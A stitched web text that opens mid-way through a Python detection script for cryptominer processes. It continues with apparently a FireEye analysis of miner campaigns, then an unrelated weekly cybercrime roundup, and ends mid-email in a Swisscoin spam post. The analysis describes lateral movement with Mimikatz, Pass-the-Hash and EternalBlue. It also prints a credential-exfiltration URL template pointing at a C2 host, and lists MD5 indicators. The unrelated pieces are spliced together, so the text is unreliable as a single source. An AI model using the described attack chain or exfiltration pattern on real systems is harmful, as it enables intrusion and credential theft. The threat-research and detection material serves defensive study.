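            return {"verdict": "known miner persistence task name", "reason": reason}
    return None


def scan_events(events):
    """Run both classifiers over (kind, detail) pairs and collect the hits."""
    findings = []
    for kind, detail in events:
        if kind == "process":
            hit = classify_cmdline(detail)
        elif kind == "task":
            hit = classify_task(detail)
        else:
            hit = None
        if hit:
            findings.append((kind, detail, hit))
    return findings


if __name__ == "__main__":
    for kind, detail, hit in scan_events(SAMPLE_EVENTS):
        print(kind, "|", detail[:60], "|", hit)
```

The pool and wallet arguments carry the signal; -a, -k, -p and -t are too generic to alert on by themselves, which is why classify_cmdline only reports them as supporting evidence. The task-name match is a lead, not a conviction: confirm the task’s action path before acting on it, since a legitimate updater can register a similarly named task.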

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether it’s running on a 32-bit or 64-bit system to determine which PowerShell script to fetch from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with the extracted credentials, and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If lateral movement with credentials fails, the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine whether it’s vulnerable to EternalBlue, and uses that vulnerability to spread to the host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner, so that cyber criminals maximize their reach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

  • POWERSHELL DOWNLOADER (METHODOLOGY)
  • MONERO MINER (METHODOLOGY)
  • MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5                                Name
3421A769308D39D4E9C7E8CAECAF7FC4   cranberry.exe/logic.exe
B3A831BFA590274902C77B6C7D4C31AE   xmrig.exe/yam.exe
26404FEDE71F3F713175A3A3CEBC619B   1.ps1
D3D10FAA69A10AC754E3B7DDE9178C22   2.ps1
9C91B5CF6ECED54ABB82D1050C5893F2   info3.ps1
3AAD3FABF29F9DF65DCBD0F308FF0FA8   info6.ps1
933633F2ACFC5909C83F5C73B6FC97CC   lower.css
B47DAF937897043745DF81F32B9D7565   lib.css
3542AC729035C0F3DB186DDF2178B6A0   bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

For starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

Chart: newly seen targets in SurfWatch Labs data for the week.

Cyber Risk Trends From the Past Week

A federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.


Swisscoin [SIC] cryptocurrency spam

Swisscoin is a fairly low-volume self-styled cryptocurrency that has been the target of a Necurs-based spam run starting on Saturday 13th January, and increasing in volume to huge levels on Monday.

From: Florine Fray [Fray.419@redacted.tld]
Date: 15 January 2018 at 10:51
Subject: Could this digital currency actually make you a millionaire?

Every once in a while, an opportunity comes